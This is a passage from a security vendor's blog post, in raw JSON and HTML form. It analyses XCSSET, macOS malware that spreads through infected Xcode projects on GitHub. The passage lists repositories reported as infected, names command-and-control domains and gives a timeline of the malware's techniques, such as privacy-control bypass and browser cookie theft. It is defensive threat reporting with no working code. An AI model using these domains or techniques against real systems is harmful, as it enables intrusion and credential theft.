tbl-proj-mixed\">Swift + Flutter<\/span><\/td>\n          <td><span class=\"tbl-date\">February 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">NandaMocha\/<\/span>Reflect<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">Swift<\/span><\/td>\n          <td><span class=\"tbl-date\">February 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">dretp\/<\/span>ascend_bible<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-flutter\">Flutter<\/span><\/td>\n          <td><span class=\"tbl-date\">February 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">shivsupekar\/<\/span>ScreenShotPreventer<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">Swift<\/span><\/td>\n          <td><span class=\"tbl-date\">February 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">NandaMocha\/<\/span>ImageRoullette<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">Swift<\/span><\/td>\n          <td><span class=\"tbl-date\">January 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">JeckyKukadiya\/<\/span>BT-Connect<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">Swift<\/span><\/td>\n          <td><span class=\"tbl-date\">January 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">kemad97\/<\/span>ProductsApp<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">Swift<\/span><\/td>\n          <td><span class=\"tbl-date\">January 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span 
class=\"tbl-repo-owner\">asoapp-web\/<\/span>RainSport<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">Swift<\/span><\/td>\n          <td><span class=\"tbl-date\">January 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">RainyofSun\/<\/span>CYSwiftExtension<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-objc\">Objective-C<\/span><\/td>\n          <td><span class=\"tbl-date\">January 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">mayankbagauli79\/<\/span>AcharyaPrashantDemoApp<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">Swift<\/span><\/td>\n          <td><span class=\"tbl-date\">December 2025<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">sdsahdev\/<\/span>flowChatDoc<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-mixed\">TypeScript + Flutter<\/span><\/td>\n          <td><span class=\"tbl-date\">November 2025<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">dvillegastech\/<\/span>ReaxBD<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-flutter\">Flutter\/Dart<\/span><\/td>\n          <td><span class=\"tbl-date\">October 2025<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">PrinceMittal1\/<\/span>DemoForAuthFlow<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-rn\">React Native<\/span><\/td>\n          <td><span class=\"tbl-date-none\">\u2014<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">zzzznick\/<\/span>dummy-ios<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-objc\">ObjC \/ Swift<\/span><\/td>\n          <td><span 
class=\"tbl-date-none\">\u2014<\/span><\/td>\n        <\/tr>\n      <\/tbody>\n    <\/table>\n  <\/div>\n<\/div>\n<\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"key-observations\"><strong>Key observations<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>First, usamajaved357\/Breezy pulls its payload from riggletoy.ru \u2013 the same C2 confirmed in our live sample in Section 4. This places both within the same campaign; the workstation analyzed earlier was likely infected via one of these public Xcode projects, though the exact vector cannot be established without forensic access to the machine.<\/li>\n<li>Second, xiaoyouPrince\/XYDevTool uses netcdndev.in, a domain that does not appear in any public IoC list to date \u2013 a new branch of the campaign&#8217;s infrastructure.<\/li>\n<li><em>Third, 12 of the 24 repositories received a commit in 2026, the most recent just one day before inspection. 
XCSSET is actively spreading right now.<\/em><\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"appendix-2-csset-timeline\">Appendix #2: CSSET Timeline<\/h2>\n\n\n\n<div>\n<style>\n  .cssetTimeline { background: transparent; padding: 32px 16px; }\n  .wrap {\n    font-family: sans-serif;\n    background: #ffffff;\n    color: #0F0063;\n    padding: 40px 28px;\n    border-radius: 16px;\n    max-width: 860px;\n    margin: 0 auto;\n    border: 1px solid #e8eaf5;\n  }\n\n  .section-label {\n    font-size: 12px;\n    font-weight: 700;\n    letter-spacing: 0.12em;\n    text-transform: uppercase;\n    color: #00DBC7;\n    margin-bottom: 8px;\n  }\n\n  .section-heading {\n    font-size: 22px;\n    font-weight: 700;\n    color: #0F0063;\n    margin-bottom: 6px;\n    line-height: 1.3;\n  }\n\n  .section-sub {\n    font-size: 13.5px;\n    color: #6b70a0;\n    margin-bottom: 24px;\n    line-height: 1.6;\n  }\n\n  \/* LEGEND *\/\n  .legend {\n    display: flex;\n    gap: 18px;\n    flex-wrap: wrap;\n    margin-bottom: 28px;\n    padding: 12px 16px;\n    background: #fafbff;\n    border: 1px solid #e8eaf5;\n    border-radius: 10px;\n  }\n  .legend-item {\n    display: flex;\n    align-items: center;\n    gap: 7px;\n    font-size: 11px;\n    color: #4a4f7a;\n    font-weight: 500;\n  }\n  .legend-dot {\n    width: 10px;\n    height: 10px;\n    border-radius: 50%;\n    flex-shrink: 0;\n  }\n  .legend-dot.verified  { background: #00DBC7; }\n  .legend-dot.approx    { background: transparent; border: 2px dashed #8890c0; width: 12px; height: 12px; }\n  .legend-dot.keyevent  { background: #FF645A; }\n  .legend-dot.adex      { background: #FF8C42; }\n\n  \/* FLOW *\/\n  .flow { display: flex; flex-direction: column; }\n\n  .flow-step {\n    display: flex;\n    align-items: flex-start;\n    gap: 16px;\n    position: relative;\n  }\n\n  .flow-step:not(:last-child)::after {\n    content: '';\n    position: absolute;\n 
   left: 19px;\n    top: 44px;\n    width: 2px;\n    height: calc(100% - 12px);\n    background: linear-gradient(to bottom, #00DBC7, #00DBC722);\n  }\n\n  .step-icon {\n    width: 40px;\n    height: 40px;\n    border-radius: 50%;\n    background: #f0fdfb;\n    border: 2px solid #00DBC7;\n    display: flex;\n    align-items: center;\n    justify-content: center;\n    flex-shrink: 0;\n    font-size: 16px;\n    position: relative;\n    z-index: 1;\n    box-shadow: 0 2px 10px rgba(0,219,199,0.15);\n  }\n  .step-icon.approx {\n    background: #f4f5fb;\n    border: 2px dashed #a0a8d0;\n    box-shadow: none;\n  }\n  .step-icon.major {\n    background: #fff5f0;\n    border: 2px solid #FF645A;\n    box-shadow: 0 2px 10px rgba(255,100,90,0.15);\n  }\n  .step-icon.adex {\n    background: #fff3eb;\n    border: 2px solid #FF8C42;\n    box-shadow: 0 2px 10px rgba(255,140,66,0.2);\n  }\n\n  .step-body {\n    background: #fafbff;\n    border: 1px solid #e8eaf5;\n    border-radius: 12px;\n    padding: 16px 20px;\n    flex: 1;\n    margin-bottom: 16px;\n    box-shadow: 0 2px 8px rgba(15,0,99,0.04);\n  }\n  .step-body.approx {\n    background: #f7f8fd;\n    border: 1px dashed #c8cce0;\n    box-shadow: none;\n  }\n  .step-body.major {\n    background: #fffafa;\n    border-color: #ffd6d4;\n  }\n  .step-body.adex {\n    background: #fff8f3;\n    border-color: #ffdec7;\n  }\n\n  .step-meta {\n    display: flex;\n    align-items: center;\n    gap: 7px;\n    margin-bottom: 6px;\n    flex-wrap: wrap;\n  }\n\n  .step-date         { font-size: 11px; font-weight: 700; letter-spacing: 0.08em; text-transform: uppercase; color: #00A696; }\n  .step-date.approx  { color: #8890c0; }\n  .step-date.major   { color: #c03030; }\n  .step-date.adex    { color: #b04800; }\n\n  .step-tag {\n    font-size: 10px;\n    font-weight: 700;\n    letter-spacing: 0.07em;\n    text-transform: uppercase;\n    padding: 2px 8px;\n    border-radius: 20px;\n    display: inline-block;\n  }\n  .tag-verified  { background: 
#e4fdf8; color: #007A6E; border: 1px solid #a0ede0; }\n  .tag-approx    { background: #f0f1f8; color: #6068a0; border: 1px solid #c8cce0; }\n  .tag-major     { background: #fff0ef; color: #c03030; border: 1px solid #ffcece; }\n  .tag-adex      { background: #fff0e0; color: #b04800; border: 1px solid #ffd0a0; }\n  .tag-neutral   { background: #ede9fe; color: #6D28D9; }\n  .tag-research  { background: #e6eeff; color: #1a4fba; }\n\n  .step-title {\n    font-size: 15px;\n    font-weight: 600;\n    color: #0F0063;\n    margin-bottom: 6px;\n  }\n  .step-desc {\n    font-size: 13px;\n    color: #4a4f7a;\n    line-height: 1.65;\n  }\n  .step-desc strong { color: #0F0063; }\n\n  code {\n    font-family: 'Courier New', monospace;\n    font-size: 11.5px;\n    background: #f0f2fc;\n    padding: 1px 5px;\n    border-radius: 4px;\n    color: #0F0063;\n  }\n  .step-body.adex code { background: #ffebd8; color: #7a2c00; }\n\n  .note {\n    margin-top: 20px;\n    background: #f0fdfb;\n    border-left: 3px solid #00DBC7;\n    border-radius: 0 10px 10px 0;\n    padding: 14px 18px;\n    font-size: 12.5px;\n    color: #4a4f7a;\n    line-height: 1.7;\n  }\n  .note strong { color: #0F0063; }\n\n  @media (max-width: 600px) {\n    .section-heading { font-size: 18px; }\n    .wrap { padding: 28px 16px; }\n    body { padding: 16px 8px; }\n    .legend { gap: 10px; }\n  }\n<\/style>\n<div class=\"cssetTimeline\">\n<div class=\"wrap\">\n\n  <div class=\"section-label\">XCSSET \u00b7 Threat Timeline<\/div>\n  <div class=\"section-heading\">Five Years in the Wild<\/div>\n  <div class=\"section-sub\">From an obscure macOS behavior documented in 2018 to active C2 infrastructure still running in April 2026.<\/div>\n\n  <div class=\"legend\">\n    <div class=\"legend-item\"><span class=\"legend-dot verified\"><\/span> Date verified from primary source<\/div>\n    <div class=\"legend-item\"><span class=\"legend-dot approx\"><\/span> Approximate date (secondary source)<\/div>\n    <div 
class=\"legend-item\"><span class=\"legend-dot keyevent\"><\/span> Key public event<\/div>\n    <div class=\"legend-item\"><span class=\"legend-dot adex\"><\/span> Adex field research<\/div>\n  <\/div>\n\n  <div class=\"flow\">\n\n    <!-- 1 -->\n    <div class=\"flow-step\">\n      <div class=\"step-icon approx\">\ud83d\udd0d<\/div>\n      <div class=\"step-body approx\">\n        <div class=\"step-meta\">\n          <span class=\"step-date approx\">~ 2018<\/span>\n          <span class=\"step-tag tag-approx\">Precursor<\/span>\n        <\/div>\n        <div class=\"step-title\">The Behavior That Made It Possible<\/div>\n        <div class=\"step-desc\">Phil Stokes (SentinelOne) documents how macOS automatically grants Remote Login (<code>sshd<\/code>) Full Disk Access. Two years later, XCSSET exploits this exact mechanism to bypass TCC privacy folder protections without triggering a user prompt.<\/div>\n      <\/div>\n    <\/div>\n\n    <!-- 2 -->\n    <div class=\"flow-step\">\n      <div class=\"step-icon approx\">\ud83e\udda0<\/div>\n      <div class=\"step-body approx\">\n        <div class=\"step-meta\">\n          <span class=\"step-date approx\">~ June 2020<\/span>\n          <span class=\"step-tag tag-approx\">First Samples<\/span>\n        <\/div>\n        <div class=\"step-title\">In the Wild \u2014 Undetected<\/div>\n        <div class=\"step-desc\">First XCSSET components appear on VirusTotal. Intego&#8217;s analysis cites upload dates of 19\u201320 June based on their own telemetry. 
The malware is already spreading \u2014 unattributed, unnamed, and undetected by the industry.<\/div>\n      <\/div>\n    <\/div>\n\n    <!-- 3 -->\n    <div class=\"flow-step\">\n      <div class=\"step-icon approx\">\ud83d\udd12<\/div>\n      <div class=\"step-body approx\">\n        <div class=\"step-meta\">\n          <span class=\"step-date approx\">~ July 2020<\/span>\n          <span class=\"step-tag tag-approx\">Silent Patch<\/span>\n        <\/div>\n        <div class=\"step-title\">Apple Knows Something<\/div>\n        <div class=\"step-desc\">Apple silently adds XProtect signature <code>MACOS.2070d41<\/code> \u2014 no public explanation, no industry notification. AV vendors spend weeks guessing what it catches. The date is based on Intego&#8217;s monitoring of XProtect update logs.<\/div>\n      <\/div>\n    <\/div>\n\n    <!-- 4 \u2014 VERIFIED -->\n    <div class=\"flow-step\">\n      <div class=\"step-icon major\">\ud83d\udce2<\/div>\n      <div class=\"step-body major\">\n        <div class=\"step-meta\">\n          <span class=\"step-date major\">August 13, 2020<\/span>\n          <span class=\"step-tag tag-major\">Public Disclosure<\/span>\n          <span class=\"step-tag tag-verified\">\u2713 Verified<\/span>\n        <\/div>\n        <div class=\"step-title\">Trend Micro &amp; Intego Name XCSSET<\/div>\n        <div class=\"step-desc\">Trend Micro publicly discloses XCSSET \u2014 date confirmed by the original blog post. Two zero-days are documented: <strong>(1) a Data Vault \/ TCC bypass<\/strong> granting access to privacy-protected folders without user prompt, and <strong>(2) a Safari UXSS exploit<\/strong> that injects JavaScript into the browser to steal live session cookies. Additional modules cover Telegram message exfiltration, Notes access, and a ransomware component. Intego publishes concurrent independent analysis the same day, estimating at least <strong>380 victim IPs<\/strong> already compromised. 
Initial victims are concentrated among Apple developers in <strong>Asia-Pacific<\/strong>.<\/div>\n      <\/div>\n    <\/div>\n\n    <!-- 5 -->\n    <div class=\"flow-step\">\n      <div class=\"step-icon approx\">\ud83d\udcbb<\/div>\n      <div class=\"step-body approx\">\n        <div class=\"step-meta\">\n          <span class=\"step-date approx\">~ Early 2021<\/span>\n          <span class=\"step-tag tag-approx\">New Variant<\/span>\n        <\/div>\n        <div class=\"step-title\">Ready for Apple Silicon<\/div>\n        <div class=\"step-desc\">A variant targeting macOS 11 and Apple Silicon (M1) is documented. The operators adapt rapidly \u2014 no meaningful gap in activity. Specific month is not independently confirmed from primary sources.<\/div>\n      <\/div>\n    <\/div>\n\n    <!-- 6 \u2014 VERIFIED -->\n    <div class=\"flow-step\">\n      <div class=\"step-icon\">\ud83e\ude79<\/div>\n      <div class=\"step-body\">\n        <div class=\"step-meta\">\n          <span class=\"step-date\">May 2021<\/span>\n          <span class=\"step-tag tag-verified\">\u2713 Verified<\/span>\n        <\/div>\n        <div class=\"step-title\">CVE-2021-30713 Patched in macOS Big Sur 11.4<\/div>\n        <div class=\"step-desc\">Apple patches CVE-2021-30713 \u2014 a TCC bypass that allowed XCSSET to silently capture screenshots and screen recordings without triggering a consent dialog. 
The vulnerability, the CVE identifier, and the Big Sur 11.4 release date are all confirmed from Apple&#8217;s official security notes.<\/div>\n      <\/div>\n    <\/div>\n\n    <!-- 7 -->\n    <div class=\"flow-step\">\n      <div class=\"step-icon approx\">\ud83c\udfaf<\/div>\n      <div class=\"step-body approx\">\n        <div class=\"step-meta\">\n          <span class=\"step-date approx\">~ Mid-2021<\/span>\n          <span class=\"step-tag tag-approx\">Expanded Scope<\/span>\n        <\/div>\n        <div class=\"step-title\">Browser Coverage Expands<\/div>\n        <div class=\"step-desc\">Trend Micro documents confirmed additional theft targets: <strong>Chrome, Opera, Brave,<\/strong> and <strong>Yandex Browser<\/strong> \u2014 each with browser-specific cookie extraction methods.<\/div>\n      <\/div>\n    <\/div>\n\n    <!-- 8 -->\n    <div class=\"flow-step\">\n      <div class=\"step-icon approx\">\ud83d\udd04<\/div>\n      <div class=\"step-body approx\">\n        <div class=\"step-meta\">\n          <span class=\"step-date approx\">~ 2022<\/span>\n          <span class=\"step-tag tag-approx\">Campaign Wave<\/span>\n        <\/div>\n        <div class=\"step-title\">Preparing for Monterey<\/div>\n        <div class=\"step-desc\">SentinelOne documents a new campaign wave. 
The authors update the malware for macOS Monterey \u2014 adapting around Python&#8217;s removal from the base OS, disguising components as <code>Notes.app<\/code>, and registering new <code>.ru<\/code> C2 domains.<\/div>\n      <\/div>\n    <\/div>\n\n    <!-- 9 \u2014 VERIFIED -->\n    <div class=\"flow-step\">\n      <div class=\"step-icon major\">\ud83d\udcf0<\/div>\n      <div class=\"step-body major\">\n        <div class=\"step-meta\">\n          <span class=\"step-date major\">February 2025<\/span>\n          <span class=\"step-tag tag-major\">Return<\/span>\n          <span class=\"step-tag tag-verified\">\u2713 Verified<\/span>\n        <\/div>\n        <div class=\"step-title\">Microsoft Discloses New Variant<\/div>\n        <div class=\"step-desc\">Microsoft Security Blog publishes analysis of a significantly updated XCSSET (~February 17). Key new capabilities: updated obfuscation layers, autostart persistence via <code>~\/.zshrc<\/code>, a fake Launchpad app, and revised Xcode project injection. The Register and BleepingComputer cover the story the same week.<\/div>\n      <\/div>\n    <\/div>\n\n    <!-- 10 \u2014 ADEX -->\n    <div class=\"flow-step\">\n      <div class=\"step-icon adex\">\ud83d\udd0e<\/div>\n      <div class=\"step-body adex\">\n        <div class=\"step-meta\">\n          <span class=\"step-date adex\">December 2025<\/span>\n          <span class=\"step-tag tag-adex\">Adex Research<\/span>\n        <\/div>\n        <div class=\"step-title\">Sample Identified in the Wild<\/div>\n        <div class=\"step-desc\">Our investigation identifies a sample matching XCSSET behavior and artifacts. 
See Section 4.<\/div>\n      <\/div>\n    <\/div>\n\n    <!-- 11 \u2014 ADEX -->\n    <div class=\"flow-step\">\n      <div class=\"step-icon adex\">\u26a0\ufe0f<\/div>\n      <div class=\"step-body adex\">\n        <div class=\"step-meta\">\n          <span class=\"step-date adex\">April 2026<\/span>\n          <span class=\"step-tag tag-adex\">Active Now<\/span>\n        <\/div>\n        <div class=\"step-title\">No New Reports. Still Running.<\/div>\n        <div class=\"step-desc\">No new public vendor reports \u2014 but the campaign has not stopped. Our GitHub search (Section 12) finds 6 infected repositories with 2026 commits. Most recent: <code>rjkalola\/OTMS-2.0-Flutter<\/code>, committed April 20, 2026. <code>riggletoy.ru<\/code> and <code>netcdndev.in<\/code> remain live.<\/div>\n      <\/div>\n    <\/div>\n\n  <\/div>\n\n  <div class=\"note\">\n    <strong>On date reliability:<\/strong> Three dates are independently verified from primary sources: <strong>August 13, 2020<\/strong> (Trend Micro blog post), <strong>May 2021<\/strong> (Apple&#8217;s Big Sur 11.4 security notes), and <strong>February 2025<\/strong> (Microsoft Security Blog). All other pre-2025 dates are derived from secondary analyses and marked with <strong>~<\/strong>. Events from December 2025 onward reflect Adex&#8217;s own field research.\n  <\/div>\n\n<\/div>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>MacOS has long been considered inherently resistant to malware, but the threat landscape tells a different story. 
Attacks targeting the Apple ecosystem are more frequent and sophisticated than commonly assumed.&nbsp; The Adex team encountered this reality first-hand: we detected, analyzed, and attributed an active XCSSET infection \u2013 one of the most persistent and evasive malware [&hellip;]<\/p>\n","protected":false},"author":9,"featured_media":5517,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[4],"tags":[18,16,17],"class_list":["post-5507","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-current_risks","tag-fraud","tag-threat","tag-virus"],"acf":[],"yoast_head_json":{"title":"Inside the Build: How XCSSET Attacks macOS Developer Pipelines - ADEX","description":"First-hand analysis of XCSSET \u2014 macOS malware spreading via Xcode projects. Verified timeline, live C2 infrastructure, and original findings by Adex.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/","og_locale":"en_US","og_type":"article","og_title":"Inside the Build: How XCSSET Attacks macOS Developer Pipelines - ADEX","og_description":"First-hand analysis of XCSSET \u2014 macOS malware spreading via Xcode projects. Verified timeline, live C2 infrastructure, and original findings by Adex.","og_url":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/","og_site_name":"ADEX","article_publisher":"https:\/\/www.facebook.com\/adexsaas\/","article_published_time":"2026-04-29T13:55:35+00:00","article_modified_time":"2026-05-01T16:04:29+00:00","og_image":[{"width":1200,"height":628,"url":"https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/04\/Adex-xcsset-case-study.png","type":"image\/png"}],"author":"Sergey Martianov","twitter_card":"summary_large_image","twitter_creator":"@adexsaas","twitter_site":"@adexsaas","twitter_misc":{"Written by":"Sergey Martianov","Est. 
reading time":"22 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/#article","isPartOf":{"@id":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/"},"author":{"name":"Sergey Martianov","@id":"https:\/\/adex.com\/blog\/#\/schema\/person\/9b104a73584bdaeab35e1d0a537f16bc"},"headline":"Inside the Build: First-Hand Analysis of XCSSET&#8217;s Attack on macOS Developer Pipelines","datePublished":"2026-04-29T13:55:35+00:00","dateModified":"2026-05-01T16:04:29+00:00","mainEntityOfPage":{"@id":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/"},"wordCount":4735,"publisher":{"@id":"https:\/\/adex.com\/blog\/#organization"},"image":{"@id":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/#primaryimage"},"thumbnailUrl":"https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/04\/Adex-xcsset-case-study.png","keywords":["Fraud","Threat","Virus"],"articleSection":["Current risks"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/","url":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/","name":"Inside the Build: How XCSSET Attacks macOS Developer Pipelines - ADEX","isPartOf":{"@id":"https:\/\/adex.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/#primaryimage"},"image":{"@id":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/#primaryimage"},"thumbnailUrl":"https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/04\/Adex-xcsset-case-study.png","datePublished":"2026-04-29T13:55:35+00:00","dateModified":"2026-05-01T16:04:29+00:00","description":"First-hand analysis of XCSSET \u2014 macOS malware spreading via Xcode projects. 
Verified timeline, live C2 infrastructure, and original findings by Adex.","breadcrumb":{"@id":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/adex.com\/blog\/case-study-xcsset-attack\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/#primaryimage","url":"https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/04\/Adex-xcsset-case-study.png","contentUrl":"https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/04\/Adex-xcsset-case-study.png","width":1200,"height":628,"caption":"Adex-xcsset-case-study"},{"@type":"BreadcrumbList","@id":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/adex.com\/blog\/"},{"@type":"ListItem","position":2,"name":"Inside the Build: First-Hand Analysis of XCSSET&#8217;s Attack on macOS Developer Pipelines"}]},{"@type":"WebSite","@id":"https:\/\/adex.com\/blog\/#website","url":"https:\/\/adex.com\/blog\/","name":"ADEX - Ad Fraud & Invalid Traffic Prevention Platform","description":"","publisher":{"@id":"https:\/\/adex.com\/blog\/#organization"},"alternateName":"ADEX","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/adex.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/adex.com\/blog\/#organization","name":"ADEX - Ad Fraud & Invalid Traffic Prevention 
Platform","url":"https:\/\/adex.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/adex.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/adex.com\/blog\/wp-content\/uploads\/2022\/05\/CDD2258_copy-48-1.svg","contentUrl":"https:\/\/adex.com\/blog\/wp-content\/uploads\/2022\/05\/CDD2258_copy-48-1.svg","width":148,"height":30,"caption":"ADEX - Ad Fraud & Invalid Traffic Prevention Platform"},"image":{"@id":"https:\/\/adex.com\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/adexsaas\/","https:\/\/x.com\/adexsaas"]},{"@type":"Person","@id":"https:\/\/adex.com\/blog\/#\/schema\/person\/9b104a73584bdaeab35e1d0a537f16bc","name":"Sergey Martianov","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/63aa45589f0085b1a03dd38f54aca5d1c9362bc41d96557a14eb60152604e513?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/63aa45589f0085b1a03dd38f54aca5d1c9362bc41d96557a14eb60152604e513?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/63aa45589f0085b1a03dd38f54aca5d1c9362bc41d96557a14eb60152604e513?s=96&d=mm&r=g","caption":"Sergey Martianov"},"description":"Chief Product Officer at 
Adex","sameAs":["http:\/\/www.adex.com"]}]}}}